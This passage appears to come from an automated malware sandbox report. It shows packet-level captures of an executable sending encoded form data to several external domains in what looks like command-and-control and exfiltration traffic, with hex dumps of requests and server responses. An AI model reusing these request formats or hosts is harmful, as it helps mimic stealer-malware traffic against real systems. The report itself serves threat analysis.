                                                                                              Data Raw: 46 4a 69 50 43 3d 59 79 4f 58 39 47 67 6b 4d 79 2b 53 38 36 30 46 2b 35 79 2b 75 42 48 47 77 2b 32 74 64 32 72 6e 56 51 79 4f 36 51 30 57 38 42 53 72 6f 39 53 56 52 62 57 34 69 67 74 61 4e 6e 34 5a 42 32 75 6d 72 2b 4b 4d 4f 71 54 4f 4f 74 66 41 4a 41 52 67 72 4d 50 62 4e 49 71 68 77 50 59 55 67 51 59 5a 69 49 6e 36 67 70 2f 32 42 44 35 6a 2b 4a 6f 5a 66 51 30 2b 47 5a 42 55 7a 48 77 72 76 74 49 2f 43 65 57 50 57 66 4c 55 55 45 33 46 46 43 6b 46 72 6c 79 71 64 4c 4e 54 39 46 64 4a 6d 39 68 6a 35 6e 47 79 65 74 4d 45 6d 2b 50 48 48 4c 6f 58 4e 7a 6c 58 6c 65 61 51 4a 54 72 44 36 66 51 31 53 73 2b 33 5a 4c 74 33 76 4c 61 2f 51 6c 69 49 4c 30 6f 79 79 38 47 52 68 72 36 4b 6c 41 79 62 77 69 35 68 73 63 6f 43 71 58 61 61 70 5a 4b 35 61 6a 64 77 47 35 41 71 61 52 52 44 36 4d 54 49 70 5a 4d 53 61 38 41 71 43 37 36 52 4b 62 53 73 2f 78 57 47 69 55 6b 2b 49 33 2b 56 70 49 6b 44 66 46 36 70 57 67 6d 36 71 74 51 4f 78 41 43 6a 44 4d 2f 41 50 46 6a 46 58 45 4f 33 6f 70 51 74 33 76 48 75 67 53 77 68 69 54 75 4e [TRUNCATED]
                                                                                              Data Ascii: FJiPC=YyOX9GgkMy+S860F+5y+uBHGw+2td2rnVQyO6Q0W8BSro9SVRbW4igtaNn4ZB2umr+KMOqTOOtfAJARgrMPbNIqhwPYUgQYZiIn6gp/2BD5j+JoZfQ0+GZBUzHwrvtI/CeWPWfLUUE3FFCkFrlyqdLNT9FdJm9hj5nGyetMEm+PHHLoXNzlXleaQJTrD6fQ1Ss+3ZLt3vLa/QliIL0oyy8GRhr6KlAybwi5hscoCqXaapZK5ajdwG5AqaRRD6MTIpZMSa8AqC76RKbSs/xWGiUk+I3+VpIkDfF6pWgm6qtQOxACjDM/APFjFXEO3opQt3vHugSwhiTuNSrR0fvjCmmqI6vBYMmRBtK2vOuHK9U/hXiCyajxhUBfVp9LlzTstV8hYsQBPLPhxQjk6HqQ2072bnPdF8AGolZnHo2yVWCmxjhhXCkBbRZLgidAZM0L2+X7jJ2ElAqdN9b23bRIbwO+7l1II3WawvZ9WDbK4fuKPVcSU+uN1xdFcWGSmlBvGxik9AhvBY85wy0ggybl0IJGTYXkqOsb8j3IBIYDB7gzWU+DXxApc0pnjN4VcAvSc35sl1o2HD6yj50Uf6hgjLrU0L2PBJW/CcbIePat5JpDyvXAh79DPlb/9uijcvHsopY4/D/sI1DVQTDMu9s8n3l7XRFjT9e1bupfOSNeCxlgXVSaoCuQDoCzQgKuCVwMLaZJWKEeHuygb0qM4AlJL325MDvSxq9pauhF2wC7jhg94e2qDBq+wV5BnDWs5Wv/2mTS7qfGIYRR2M1P3awCv0fl4lX9GCv7wT+6YqgDFFIJ7+I3E9hVJkbhszcqLAaZSzidwfiFbgUbsM4BshzeDts7ZZlpfcI4XymB6dg6FPkcsEQ/lbYnELT/dBC0o+6yua1O7SSuLA6iyvfh8k3wYj/y/CLBPNNS31s6MMYYzCkwe2a5+yvhtg9z5OJ6zcWCw6+vXd/PVdT9CWRqx65UNRUPwnzvTvXQoSVg6pR+sUlNNWS [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.450013208.91.197.27805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:43.845465899 CEST412OUTGET /vikk/?2FO=QBbT1R8&FJiPC=Vwm3+xEBUAulxK0F/Lnzrwv8wIKeamv3GC2vqAJo9BSRvdXyR+/4nl5nZn54cU6IqZGvOoCIPeejeQQ8mZnJIpSF+K87khcOo5HnxJigNxRW7ek1bxUyIJ4= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.dealsbyaustin.online
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:28:44.731414080 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Tue, 08 Oct 2024 03:28:44 GMT
                                                                                              Server: Apache
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                              Set-Cookie: vsid=904vr47590372452288251; expires=Sun, 07-Oct-2029 03:28:44 GMT; Max-Age=157680000; path=/; domain=www.dealsbyaustin.online; HttpOnly
                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_HiXc1Qkvi0nsnJxgYZiZxGJ130YLcl/viuXz7VzcWGR6fN7EoD44/ExJEJJ3l3q52Sz4NLbnxdWkmZUrsVaufA==
                                                                                              Content-Length: 2640
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 48 69 58 63 31 51 6b 76 69 30 6e 73 6e 4a 78 67 59 5a 69 5a 78 47 4a 31 33 30 59 4c 63 6c 2f 76 69 75 58 7a 37 56 7a 63 57 47 52 36 66 4e 37 45 6f 44 34 34 2f 45 78 4a 45 4a 4a 33 6c 33 71 35 32 53 7a 34 4e 4c 62 6e 78
                                                                                              Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_HiXc1Qkvi0nsnJxgYZiZxGJ130YLcl/viuXz7VzcWGR6fN7EoD44/ExJEJJ3l3q52Sz4NLbnx
                                                                                              Oct 8, 2024 05:28:44.731492043 CEST1236INData Raw: 64 57 6b 6d 5a 55 72 73 56 61 75 66 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74
                                                                                              Data Ascii: dWkmZUrsVaufA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.dealsbyaustin.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.dealsbyaustin.online/px.js?ch=2"
                                                                                              Oct 8, 2024 05:28:44.731530905 CEST1162INData Raw: 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20
                                                                                              Data Ascii: tyle> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.45001434.251.91.168805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:49.815325975 CEST687OUTPOST /qc9x/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.portfolioalex.net
                                                                                              Origin: http://www.portfolioalex.net
                                                                                              Referer: http://www.portfolioalex.net/qc9x/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 50 46 53 2b 76 50 63 70 71 70 39 65 44 41 6c 51 37 37 54 6e 61 62 30 62 6f 59 5a 76 4b 6c 30 30 77 78 36 6b 79 72 55 41 6e 37 43 48 72 64 50 48 55 4c 2f 77 69 4a 5a 75 43 79 78 78 4d 72 42 6b 6f 70 34 31 36 34 78 37 65 42 78 49 4a 58 58 67 4b 30 4f 65 58 57 43 68 46 64 5a 44 44 61 54 59 6a 51 66 36 47 58 58 48 4d 38 47 62 4a 62 61 6f 46 52 36 69 6a 56 6a 69 37 6a 33 69 63 31 4f 70 59 6f 64 6f 55 46 62 72 65 4e 2f 79 59 7a 7a 72 6a 78 75 49 67 6f 34 4c 74 33 46 4d 50 56 50 52 63 64 73 49 64 67 76 53 64 36 2f 39 76 6f 70 6f 46 49 4d 53 62 6c 72 69 4a 30 48 57 4d 2b 71 30 70 67 3d 3d
                                                                                              Data Ascii: FJiPC=PFS+vPcpqp9eDAlQ77Tnab0boYZvKl00wx6kyrUAn7CHrdPHUL/wiJZuCyxxMrBkop4164x7eBxIJXXgK0OeXWChFdZDDaTYjQf6GXXHM8GbJbaoFR6ijVji7j3ic1OpYodoUFbreN/yYzzrjxuIgo4Lt3FMPVPRcdsIdgvSd6/9vopoFIMSblriJ0HWM+q0pg==
                                                                                              Oct 8, 2024 05:28:50.407948017 CEST254INHTTP/1.1 405 Not Allowed
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 38
                                                                                              Connection: close
                                                                                              Server: PORTFOLIOBOX (www.portfoliobox.net)
                                                                                              App: Route(80)
                                                                                              Route-80-Updated: 1726821898
                                                                                              Allow: GET, POST
                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d
                                                                                              Data Ascii: {"status":405,"message":"Not allowed"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.45001534.251.91.168805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:52.365696907 CEST707OUTPOST /qc9x/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.portfolioalex.net
                                                                                              Origin: http://www.portfolioalex.net
                                                                                              Referer: http://www.portfolioalex.net/qc9x/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 50 46 53 2b 76 50 63 70 71 70 39 65 4d 41 56 51 38 61 54 6e 64 37 30 63 6e 34 5a 76 63 56 31 63 77 78 32 6b 79 72 38 32 6e 4e 36 48 71 39 66 48 54 36 2f 77 6c 4a 5a 75 57 69 78 77 54 37 42 2f 6f 70 6b 39 36 36 56 37 65 42 31 49 4a 58 6e 67 4b 44 69 66 52 47 43 2f 4f 39 5a 46 48 61 54 59 6a 51 66 36 47 58 54 74 4d 2f 32 62 4a 49 43 6f 45 30 4f 6c 75 31 6a 74 7a 44 33 69 59 31 4f 6c 59 6f 63 4e 55 41 7a 46 65 4f 58 79 59 79 44 72 69 6c 79 4c 72 6f 34 52 68 6e 45 36 4d 51 2b 69 56 64 35 36 53 43 6d 32 51 37 66 6a 71 75 34 79 55 35 74 46 4a 6c 50 52 55 7a 4f 69 42 39 58 39 79 73 62 36 70 4e 5a 55 52 64 77 53 35 46 6d 49 66 52 48 5a 34 78 49 3d
                                                                                              Data Ascii: FJiPC=PFS+vPcpqp9eMAVQ8aTnd70cn4ZvcV1cwx2kyr82nN6Hq9fHT6/wlJZuWixwT7B/opk966V7eB1IJXngKDifRGC/O9ZFHaTYjQf6GXTtM/2bJICoE0Olu1jtzD3iY1OlYocNUAzFeOXyYyDrilyLro4RhnE6MQ+iVd56SCm2Q7fjqu4yU5tFJlPRUzOiB9X9ysb6pNZURdwS5FmIfRHZ4xI=
                                                                                              Oct 8, 2024 05:28:52.977632046 CEST254INHTTP/1.1 405 Not Allowed
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 38
                                                                                              Connection: close
                                                                                              Server: PORTFOLIOBOX (www.portfoliobox.net)
                                                                                              App: Route(80)
                                                                                              Route-80-Updated: 1726821898
                                                                                              Allow: GET, POST
                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d
                                                                                              Data Ascii: {"status":405,"message":"Not allowed"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.45001634.251.91.168805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:54.920206070 CEST10789OUTPOST /qc9x/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.portfolioalex.net
                                                                                              Origin: http://www.portfolioalex.net
                                                                                              Referer: http://www.portfolioalex.net/qc9x/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 50 46 53 2b 76 50 63 70 71 70 39 65 4d 41 56 51 38 61 54 6e 64 37 30 63 6e 34 5a 76 63 56 31 63 77 78 32 6b 79 72 38 32 6e 4f 61 48 71 4f 48 48 55 70 6e 77 6b 4a 5a 75 56 69 78 74 54 37 42 79 6f 70 73 35 36 36 5a 72 65 44 39 49 49 31 76 67 4d 79 69 66 59 47 43 2f 42 64 5a 45 44 61 54 4e 6a 52 7a 6d 47 58 44 74 4d 2f 32 62 4a 4a 79 6f 4e 42 36 6c 39 46 6a 69 37 6a 33 75 63 31 50 4d 59 6f 46 77 55 41 2f 37 64 2b 33 79 59 53 54 72 68 51 75 4c 70 49 34 50 69 6e 45 79 4d 51 36 39 56 64 6b 44 53 44 54 54 51 37 72 6a 72 5a 4d 6c 4f 49 31 63 55 46 6e 72 44 79 4f 79 49 4f 48 63 79 74 58 4f 6f 49 39 2b 44 76 34 77 79 69 47 59 4a 54 48 39 69 6e 6a 61 45 53 4e 37 56 58 56 4d 49 39 55 70 42 4a 36 5a 73 2f 6a 59 4c 62 2f 67 53 45 42 4e 30 66 6a 67 68 72 53 4b 52 31 33 78 66 66 6d 77 75 38 61 69 4d 4e 4f 4e 41 57 6a 70 44 35 2f 38 39 4a 63 65 53 43 4a 43 4f 2f 43 53 64 2b 4a 73 32 79 61 61 71 4e 78 4c 49 6d 34 4d 58 48 50 66 62 36 67 56 76 77 4a 2b 34 65 49 61 7a 44 59 6c 7a 35 6a 35 4e 41 59 76 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=PFS+vPcpqp9eMAVQ8aTnd70cn4ZvcV1cwx2kyr82nOaHqOHHUpnwkJZuVixtT7Byops566ZreD9II1vgMyifYGC/BdZEDaTNjRzmGXDtM/2bJJyoNB6l9Fji7j3uc1PMYoFwUA/7d+3yYSTrhQuLpI4PinEyMQ69VdkDSDTTQ7rjrZMlOI1cUFnrDyOyIOHcytXOoI9+Dv4wyiGYJTH9injaESN7VXVMI9UpBJ6Zs/jYLb/gSEBN0fjghrSKR13xffmwu8aiMNONAWjpD5/89JceSCJCO/CSd+Js2yaaqNxLIm4MXHPfb6gVvwJ+4eIazDYlz5j5NAYv/GqZrleid2ckLDudqyFn3FtPPmp2bHvmvrqu4fiuXWJet+4PkyL+sNnPoCdZ6G4Qkq1VWP2fgsAR+6qcWxTTPE4/tR+mPAqEMOMQU68ghAJIPiSddHZc/65YbRgv0eM126l3P62HIYdOJOI+Qi/6hCYew4ezv1dj7DD2SV1QXqP5LXepG9YvoiN3NJAQs/YJAglHDoGCvb+sP+iZTimT+rWO64qncENZkzJs+Z5CmUMo/43qsAM/N+WBg0t8HsdWFygcPm3c92+BihyMLVu1uZK2pqLbs7e4FV+0j5NbsFEIHo67aPk4UUbTmlvnvSHOLcGG9U4ULDzOsxTzogUjexXTVJTPDAZVYVmfcqiXhxiV5lg1WgcyyiK4eRqoOu9z+ER93cB/WY9VGjlFstu3OsdabsfNaTuZE0YsPDxvL2OS+8XlQ15Iv+Pq3rDc3IQx8DsrlYqn/eCdBRVZRA6BDg8wwKkm991+/DJkmj620m+rVFVs+U1wIbmyV4cmgD0pUDueuO4Rvn2OZxeGRoa2jFUMd0cxUKHKGBQ3h8qZB5+Kn2Oq9KzfEA27+7LadCoeVKY2eC4A9OLGqU5aGW7ybWGS87kqkQ/EogNTJFgMldoOLvSixj9wTWBJF6GKwNaHS9yZ4rP5UeSQFpasJ8t0jtVUW5Z+wR0and [TRUNCATED]
                                                                                              Oct 8, 2024 05:28:55.506795883 CEST254INHTTP/1.1 405 Not Allowed
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 38
                                                                                              Connection: close
                                                                                              Server: PORTFOLIOBOX (www.portfoliobox.net)
                                                                                              App: Route(80)
                                                                                              Route-80-Updated: 1726821898
                                                                                              Allow: GET, POST
                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d
                                                                                              Data Ascii: {"status":405,"message":"Not allowed"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.45001734.251.91.168805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:57.454408884 CEST409OUTGET /qc9x/?FJiPC=CH6es5sz3Yp3Dzc51aPhdqkDrs8TQW5n7Byc8aIZtNO3gPawIMb4v5YCCRVXNYl8oq0F7aM/LA9nPzXcA0LmQW2fPOlpD7vAsWT5J3PgK+m9VafrfVSbrXQ=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.portfolioalex.net
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:28:58.080091000 CEST247INHTTP/1.1 444
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 42
                                                                                              Connection: close
                                                                                              Server: PORTFOLIOBOX (www.portfoliobox.net)
                                                                                              App: Route(80)
                                                                                              Route-80-Updated: 1726821898
                                                                                              Allow: GET, POST
                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 34 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 55 72 6c 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d
                                                                                              Data Ascii: {"status":444,"message":"Url not allowed"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.45001884.32.84.32805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:03.179290056 CEST678OUTPOST /8j8d/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.luxurylive.xyz
                                                                                              Origin: http://www.luxurylive.xyz
                                                                                              Referer: http://www.luxurylive.xyz/8j8d/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 6f 6a 56 77 64 79 64 39 6d 56 31 45 30 66 6a 4b 52 4c 71 53 4a 7a 48 74 75 31 63 7a 62 75 62 6a 63 49 5a 62 52 4c 65 57 74 46 63 79 30 33 48 38 64 58 54 6c 63 76 61 65 78 74 79 77 77 2f 59 4b 46 6f 44 79 4f 36 43 54 2b 65 32 6f 45 32 35 41 71 63 30 41 32 63 33 38 68 58 36 57 6f 43 4d 2f 46 65 41 44 4c 73 2b 4f 58 49 45 31 67 56 71 49 6a 67 48 66 6a 43 33 79 47 71 4f 51 36 50 63 68 39 6b 4f 51 50 74 6f 50 6e 6c 46 58 76 36 73 43 61 51 62 68 36 35 6f 44 70 43 52 66 73 38 46 6e 38 73 59 66 63 34 5a 67 6c 63 30 69 57 71 71 74 59 35 4e 6a 30 42 74 50 79 71 4a 74 77 4a 37 59 76 41 3d 3d
                                                                                              Data Ascii: FJiPC=ojVwdyd9mV1E0fjKRLqSJzHtu1czbubjcIZbRLeWtFcy03H8dXTlcvaextyww/YKFoDyO6CT+e2oE25Aqc0A2c38hX6WoCM/FeADLs+OXIE1gVqIjgHfjC3yGqOQ6Pch9kOQPtoPnlFXv6sCaQbh65oDpCRfs8Fn8sYfc4Zglc0iWqqtY5Nj0BtPyqJtwJ7YvA==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.45001984.32.84.32805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:05.730988979 CEST698OUTPOST /8j8d/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.luxurylive.xyz
                                                                                              Origin: http://www.luxurylive.xyz
                                                                                              Referer: http://www.luxurylive.xyz/8j8d/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 6f 6a 56 77 64 79 64 39 6d 56 31 45 31 2f 7a 4b 51 6f 43 53 46 44 48 75 72 31 63 7a 53 4f 61 71 63 49 56 62 52 4c 32 47 74 58 49 79 7a 54 4c 38 63 56 33 6c 56 2f 61 65 35 4e 7a 37 2b 66 59 42 46 6f 66 4c 4f 37 4f 54 2b 65 53 6f 45 79 78 41 72 74 30 44 32 4d 33 70 74 33 36 55 31 79 4d 2f 46 65 41 44 4c 6f 76 62 58 49 4d 31 68 6c 61 49 69 45 62 51 75 69 33 74 57 36 4f 51 2b 50 64 6d 39 6b 4f 79 50 76 64 67 6e 6e 74 58 76 2f 41 43 5a 43 6a 67 76 4a 6f 4a 33 79 51 53 76 4d 6b 57 31 74 52 59 42 59 35 51 6b 49 67 51 58 73 37 33 4a 49 73 30 6d 42 4a 38 76 74 41 5a 39 4b 47 52 30 47 68 41 38 71 34 57 4a 75 71 6e 62 6e 31 6c 6b 79 62 51 51 74 51 3d
                                                                                              Data Ascii: FJiPC=ojVwdyd9mV1E1/zKQoCSFDHur1czSOaqcIVbRL2GtXIyzTL8cV3lV/ae5Nz7+fYBFofLO7OT+eSoEyxArt0D2M3pt36U1yM/FeADLovbXIM1hlaIiEbQui3tW6OQ+Pdm9kOyPvdgnntXv/ACZCjgvJoJ3yQSvMkW1tRYBY5QkIgQXs73JIs0mBJ8vtAZ9KGR0GhA8q4WJuqnbn1lkybQQtQ=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.45002084.32.84.32805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:08.278836966 CEST10780OUTPOST /8j8d/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.luxurylive.xyz
                                                                                              Origin: http://www.luxurylive.xyz
                                                                                              Referer: http://www.luxurylive.xyz/8j8d/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 6f 6a 56 77 64 79 64 39 6d 56 31 45 31 2f 7a 4b 51 6f 43 53 46 44 48 75 72 31 63 7a 53 4f 61 71 63 49 56 62 52 4c 32 47 74 58 77 79 30 67 44 38 63 31 4c 6c 48 76 61 65 7a 74 7a 34 2b 66 59 63 46 6f 47 44 4f 37 53 6c 2b 63 61 6f 46 51 70 41 36 70 6f 44 39 4d 33 70 6c 58 36 56 6f 43 4d 6d 46 65 51 48 4c 73 7a 62 58 49 4d 31 68 6d 53 49 79 67 48 51 39 53 33 79 47 71 4f 55 36 50 63 42 39 6b 58 4e 50 73 78 4b 6e 57 4e 58 6f 66 51 43 56 58 50 67 7a 5a 6f 48 32 79 52 42 76 4d 6f 4e 31 70 35 6c 42 59 4e 70 6b 50 49 51 55 34 2b 4f 4f 34 63 73 37 77 56 32 74 36 6c 39 38 4b 32 54 74 57 59 35 74 59 31 4c 61 66 69 55 62 41 45 4b 78 53 6a 6b 50 70 56 57 5a 30 4e 41 41 6a 2f 53 6e 69 6f 64 53 6f 38 77 78 6d 46 6b 52 33 54 61 56 4a 7a 51 47 64 42 41 76 4e 73 31 34 61 4e 4f 77 78 39 39 57 49 52 73 59 62 59 4b 6e 72 47 6d 51 65 35 59 7a 46 78 4d 68 2f 2f 6e 63 38 54 37 58 4b 6a 6f 57 38 4f 56 6e 30 75 66 46 58 5a 31 32 59 4b 39 4f 32 32 33 76 71 73 79 58 70 4d 39 4f 2f 2f 52 74 76 37 68 5a 73 52 46 [TRUNCATED]
